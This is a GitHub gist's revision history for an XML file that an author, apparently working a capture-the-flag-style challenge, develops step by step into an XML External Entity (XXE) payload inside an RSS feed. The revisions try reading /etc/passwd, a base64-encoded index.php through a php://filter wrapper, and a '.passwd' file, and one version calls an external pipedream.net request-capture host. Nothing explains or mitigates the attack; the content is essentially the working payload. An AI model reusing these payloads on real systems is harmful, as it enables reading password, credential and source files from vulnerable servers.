Skip to content

Instantly share code, notes, and snippets.

@NitriKx
Last active May 20, 2025 14:36
Show Gist options
  • Select an option

  • Save NitriKx/534282217cdf96bc1e5efa1995be19d1 to your computer and use it in GitHub Desktop.

Select an option

Save NitriKx/534282217cdf96bc1e5efa1995be19d1 to your computer and use it in GitHub Desktop.

Revisions

  1. NitriKx revised this gist May 20, 2025. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion file.xml
    Original file line number Diff line number Diff line change
    @@ -1,6 +1,6 @@
    <?xml version="1.0" ?>
    <!DOCTYPE title [ <!ELEMENT title ANY >
    <!ENTITY xxe SYSTEM "file://.passwd" >]>
    <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=.passwd" >]>

    <rss version="2.0">
    <channel>
  2. NitriKx revised this gist May 20, 2025. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion file.xml
    Original file line number Diff line number Diff line change
    @@ -1,6 +1,6 @@
    <?xml version="1.0" ?>
    <!DOCTYPE title [ <!ELEMENT title ANY >
    <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >]>
    <!ENTITY xxe SYSTEM "file://.passwd" >]>

    <rss version="2.0">
    <channel>
  3. NitriKx revised this gist May 20, 2025. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion file.xml
    Original file line number Diff line number Diff line change
    @@ -1,6 +1,6 @@
    <?xml version="1.0" ?>
    <!DOCTYPE title [ <!ELEMENT title ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >]>

    <rss version="2.0">
    <channel>
  4. NitriKx revised this gist May 20, 2025. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion file.xml
    Original file line number Diff line number Diff line change
    @@ -1,6 +1,6 @@
    <?xml version="1.0" ?>
    <!DOCTYPE title [ <!ELEMENT title ANY >
    <!ENTITY xxe SYSTEM "https://ensg4np1qmw7t52.m.pipedream.net/xxe" >]>
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

    <rss version="2.0">
    <channel>
  5. NitriKx revised this gist May 20, 2025. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion file.xml
    Original file line number Diff line number Diff line change
    @@ -1,6 +1,6 @@
    <?xml version="1.0" ?>
    <!DOCTYPE title [ <!ELEMENT title ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <!ENTITY xxe SYSTEM "https://ensg4np1qmw7t52.m.pipedream.net/xxe" >]>

    <rss version="2.0">
    <channel>
  6. NitriKx revised this gist May 20, 2025. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion file.xml
    Original file line number Diff line number Diff line change
    @@ -12,7 +12,7 @@
    <link>http:///www.xul.fr/index.php</link>
    </image>
    <item>
    <title>Nouvelle du jour</title>
    <title>Nouvelle du jour&xxe;</title>
    <link>https://www.xul.fr/xml-rss.html</link>
    <description>Tout savoir sur RSS</description>
    </item>
  7. NitriKx revised this gist May 20, 2025. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion file.xml
    Original file line number Diff line number Diff line change
    @@ -1,6 +1,6 @@
    <?xml version="1.0" ?>
    <!DOCTYPE title [ <!ELEMENT title ANY >
    <!ENTITY xxe SYSTEM "https://ensg4np1qmw7t52.m.pipedream.net/xxe" >]>
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

    <rss version="2.0">
    <channel>
  8. NitriKx revised this gist May 20, 2025. 1 changed file with 4 additions and 1 deletion.
    5 changes: 4 additions & 1 deletion file.xml
    Original file line number Diff line number Diff line change
    @@ -1,7 +1,10 @@
    <?xml version="1.0" ?>
    <!DOCTYPE title [ <!ELEMENT title ANY >
    <!ENTITY xxe SYSTEM "https://ensg4np1qmw7t52.m.pipedream.net/xxe" >]>

    <rss version="2.0">
    <channel>
    <title>Ajax et XML</title>
    <title>Ajax et XML&xxe;</title>
    <link>https://www.xul.fr/</link>
    <description>L'interface graphique XML etc...</description>
    <image>
  9. NitriKx revised this gist May 20, 2025. 1 changed file with 19 additions and 17 deletions.
    36 changes: 19 additions & 17 deletions file.xml
    Original file line number Diff line number Diff line change
    @@ -1,20 +1,22 @@
    <?xml version="1.0" encoding="UTF-8" ?>
    <?xml version="1.0" ?>
    <rss version="2.0">

    <channel>
    <title>W3Schools Home Page</title>
    <link>https://www.w3schools.com</link>
    <description>Free web building tutorials</description>
    <item>
    <title>RSS Tutorial</title>
    <link>https://www.w3schools.com/xml/xml_rss.asp</link>
    <description>New RSS tutorial on W3Schools</description>
    </item>
    <item>
    <title>XML Tutorial</title>
    <link>https://www.w3schools.com/xml</link>
    <description>New XML tutorial on W3Schools</description>
    </item>
    </channel>

    <title>Ajax et XML</title>
    <link>https://www.xul.fr/</link>
    <description>L'interface graphique XML etc...</description>
    <image>
    <url>http:///www.xul.fr/xul-icon.gif</url>
    <link>http:///www.xul.fr/index.php</link>
    </image>
    <item>
    <title>Nouvelle du jour</title>
    <link>https://www.xul.fr/xml-rss.html</link>
    <description>Tout savoir sur RSS</description>
    </item>
    <item>
    <title>Nouvelle du lendemain</title>
    <link>https://www.xul.fr/xml-rdf.php</link>
    <description>Et tout savoir sur RDF</description>
    </item>
    </channel>
    </rss>
  10. NitriKx revised this gist May 20, 2025. 1 changed file with 20 additions and 120 deletions.
    140 changes: 20 additions & 120 deletions file.xml
    Original file line number Diff line number Diff line change
    @@ -1,120 +1,20 @@
    <?xml version="1.0"?>
    <catalog>
    <book id="bk101">
    <author>Gambardella, Matthew</author>
    <title>XML Developer's Guide</title>
    <genre>Computer</genre>
    <price>44.95</price>
    <publish_date>2000-10-01</publish_date>
    <description>An in-depth look at creating applications
    with XML.</description>
    </book>
    <book id="bk102">
    <author>Ralls, Kim</author>
    <title>Midnight Rain</title>
    <genre>Fantasy</genre>
    <price>5.95</price>
    <publish_date>2000-12-16</publish_date>
    <description>A former architect battles corporate zombies,
    an evil sorceress, and her own childhood to become queen
    of the world.</description>
    </book>
    <book id="bk103">
    <author>Corets, Eva</author>
    <title>Maeve Ascendant</title>
    <genre>Fantasy</genre>
    <price>5.95</price>
    <publish_date>2000-11-17</publish_date>
    <description>After the collapse of a nanotechnology
    society in England, the young survivors lay the
    foundation for a new society.</description>
    </book>
    <book id="bk104">
    <author>Corets, Eva</author>
    <title>Oberon's Legacy</title>
    <genre>Fantasy</genre>
    <price>5.95</price>
    <publish_date>2001-03-10</publish_date>
    <description>In post-apocalypse England, the mysterious
    agent known only as Oberon helps to create a new life
    for the inhabitants of London. Sequel to Maeve
    Ascendant.</description>
    </book>
    <book id="bk105">
    <author>Corets, Eva</author>
    <title>The Sundered Grail</title>
    <genre>Fantasy</genre>
    <price>5.95</price>
    <publish_date>2001-09-10</publish_date>
    <description>The two daughters of Maeve, half-sisters,
    battle one another for control of England. Sequel to
    Oberon's Legacy.</description>
    </book>
    <book id="bk106">
    <author>Randall, Cynthia</author>
    <title>Lover Birds</title>
    <genre>Romance</genre>
    <price>4.95</price>
    <publish_date>2000-09-02</publish_date>
    <description>When Carla meets Paul at an ornithology
    conference, tempers fly as feathers get ruffled.</description>
    </book>
    <book id="bk107">
    <author>Thurman, Paula</author>
    <title>Splish Splash</title>
    <genre>Romance</genre>
    <price>4.95</price>
    <publish_date>2000-11-02</publish_date>
    <description>A deep sea diver finds true love twenty
    thousand leagues beneath the sea.</description>
    </book>
    <book id="bk108">
    <author>Knorr, Stefan</author>
    <title>Creepy Crawlies</title>
    <genre>Horror</genre>
    <price>4.95</price>
    <publish_date>2000-12-06</publish_date>
    <description>An anthology of horror stories about roaches,
    centipedes, scorpions and other insects.</description>
    </book>
    <book id="bk109">
    <author>Kress, Peter</author>
    <title>Paradox Lost</title>
    <genre>Science Fiction</genre>
    <price>6.95</price>
    <publish_date>2000-11-02</publish_date>
    <description>After an inadvertant trip through a Heisenberg
    Uncertainty Device, James Salway discovers the problems
    of being quantum.</description>
    </book>
    <book id="bk110">
    <author>O'Brien, Tim</author>
    <title>Microsoft .NET: The Programming Bible</title>
    <genre>Computer</genre>
    <price>36.95</price>
    <publish_date>2000-12-09</publish_date>
    <description>Microsoft's .NET initiative is explored in
    detail in this deep programmer's reference.</description>
    </book>
    <book id="bk111">
    <author>O'Brien, Tim</author>
    <title>MSXML3: A Comprehensive Guide</title>
    <genre>Computer</genre>
    <price>36.95</price>
    <publish_date>2000-12-01</publish_date>
    <description>The Microsoft MSXML3 parser is covered in
    detail, with attention to XML DOM interfaces, XSLT processing,
    SAX and more.</description>
    </book>
    <book id="bk112">
    <author>Galos, Mike</author>
    <title>Visual Studio 7: A Comprehensive Guide</title>
    <genre>Computer</genre>
    <price>49.95</price>
    <publish_date>2001-04-16</publish_date>
    <description>Microsoft Visual Studio 7 is explored in depth,
    looking at how Visual Basic, Visual C++, C#, and ASP+ are
    integrated into a comprehensive development
    environment.</description>
    </book>
    </catalog>
    <?xml version="1.0" encoding="UTF-8" ?>
    <rss version="2.0">

    <channel>
    <title>W3Schools Home Page</title>
    <link>https://www.w3schools.com</link>
    <description>Free web building tutorials</description>
    <item>
    <title>RSS Tutorial</title>
    <link>https://www.w3schools.com/xml/xml_rss.asp</link>
    <description>New RSS tutorial on W3Schools</description>
    </item>
    <item>
    <title>XML Tutorial</title>
    <link>https://www.w3schools.com/xml</link>
    <description>New XML tutorial on W3Schools</description>
    </item>
    </channel>

    </rss>
  11. NitriKx revised this gist May 20, 2025. 1 changed file with 119 additions and 1 deletion.
    120 changes: 119 additions & 1 deletion file.xml
    Original file line number Diff line number Diff line change
    @@ -1,2 +1,120 @@
    <?xml version="1.0"?>
    <data>xxx</data>
    <catalog>
    <book id="bk101">
    <author>Gambardella, Matthew</author>
    <title>XML Developer's Guide</title>
    <genre>Computer</genre>
    <price>44.95</price>
    <publish_date>2000-10-01</publish_date>
    <description>An in-depth look at creating applications
    with XML.</description>
    </book>
    <book id="bk102">
    <author>Ralls, Kim</author>
    <title>Midnight Rain</title>
    <genre>Fantasy</genre>
    <price>5.95</price>
    <publish_date>2000-12-16</publish_date>
    <description>A former architect battles corporate zombies,
    an evil sorceress, and her own childhood to become queen
    of the world.</description>
    </book>
    <book id="bk103">
    <author>Corets, Eva</author>
    <title>Maeve Ascendant</title>
    <genre>Fantasy</genre>
    <price>5.95</price>
    <publish_date>2000-11-17</publish_date>
    <description>After the collapse of a nanotechnology
    society in England, the young survivors lay the
    foundation for a new society.</description>
    </book>
    <book id="bk104">
    <author>Corets, Eva</author>
    <title>Oberon's Legacy</title>
    <genre>Fantasy</genre>
    <price>5.95</price>
    <publish_date>2001-03-10</publish_date>
    <description>In post-apocalypse England, the mysterious
    agent known only as Oberon helps to create a new life
    for the inhabitants of London. Sequel to Maeve
    Ascendant.</description>
    </book>
    <book id="bk105">
    <author>Corets, Eva</author>
    <title>The Sundered Grail</title>
    <genre>Fantasy</genre>
    <price>5.95</price>
    <publish_date>2001-09-10</publish_date>
    <description>The two daughters of Maeve, half-sisters,
    battle one another for control of England. Sequel to
    Oberon's Legacy.</description>
    </book>
    <book id="bk106">
    <author>Randall, Cynthia</author>
    <title>Lover Birds</title>
    <genre>Romance</genre>
    <price>4.95</price>
    <publish_date>2000-09-02</publish_date>
    <description>When Carla meets Paul at an ornithology
    conference, tempers fly as feathers get ruffled.</description>
    </book>
    <book id="bk107">
    <author>Thurman, Paula</author>
    <title>Splish Splash</title>
    <genre>Romance</genre>
    <price>4.95</price>
    <publish_date>2000-11-02</publish_date>
    <description>A deep sea diver finds true love twenty
    thousand leagues beneath the sea.</description>
    </book>
    <book id="bk108">
    <author>Knorr, Stefan</author>
    <title>Creepy Crawlies</title>
    <genre>Horror</genre>
    <price>4.95</price>
    <publish_date>2000-12-06</publish_date>
    <description>An anthology of horror stories about roaches,
    centipedes, scorpions and other insects.</description>
    </book>
    <book id="bk109">
    <author>Kress, Peter</author>
    <title>Paradox Lost</title>
    <genre>Science Fiction</genre>
    <price>6.95</price>
    <publish_date>2000-11-02</publish_date>
    <description>After an inadvertant trip through a Heisenberg
    Uncertainty Device, James Salway discovers the problems
    of being quantum.</description>
    </book>
    <book id="bk110">
    <author>O'Brien, Tim</author>
    <title>Microsoft .NET: The Programming Bible</title>
    <genre>Computer</genre>
    <price>36.95</price>
    <publish_date>2000-12-09</publish_date>
    <description>Microsoft's .NET initiative is explored in
    detail in this deep programmer's reference.</description>
    </book>
    <book id="bk111">
    <author>O'Brien, Tim</author>
    <title>MSXML3: A Comprehensive Guide</title>
    <genre>Computer</genre>
    <price>36.95</price>
    <publish_date>2000-12-01</publish_date>
    <description>The Microsoft MSXML3 parser is covered in
    detail, with attention to XML DOM interfaces, XSLT processing,
    SAX and more.</description>
    </book>
    <book id="bk112">
    <author>Galos, Mike</author>
    <title>Visual Studio 7: A Comprehensive Guide</title>
    <genre>Computer</genre>
    <price>49.95</price>
    <publish_date>2001-04-16</publish_date>
    <description>Microsoft Visual Studio 7 is explored in depth,
    looking at how Visual Basic, Visual C++, C#, and ASP+ are
    integrated into a comprehensive development
    environment.</description>
    </book>
    </catalog>
  12. NitriKx revised this gist May 20, 2025. 1 changed file with 1 addition and 5 deletions.
    6 changes: 1 addition & 5 deletions file.xml
    Original file line number Diff line number Diff line change
    @@ -1,6 +1,2 @@
    <?xml version="1.0"?>
    <!DOCTYPE data [
    <!ELEMENT data (#ANY)>
    <!ENTITY file SYSTEM "file:///sys/power/image_size">
    ]>
    <data>&file;</data>
    <data>xxx</data>
  13. NitriKx revised this gist May 20, 2025. 1 changed file with 6 additions and 1 deletion.
    7 changes: 6 additions & 1 deletion file.xml
    Original file line number Diff line number Diff line change
    @@ -1 +1,6 @@
    dddd
    <?xml version="1.0"?>
    <!DOCTYPE data [
    <!ELEMENT data (#ANY)>
    <!ENTITY file SYSTEM "file:///sys/power/image_size">
    ]>
    <data>&file;</data>
  14. NitriKx created this gist May 20, 2025.
    1 change: 1 addition & 0 deletions file.xml
    Original file line number Diff line number Diff line change
    @@ -0,0 +1 @@
    dddd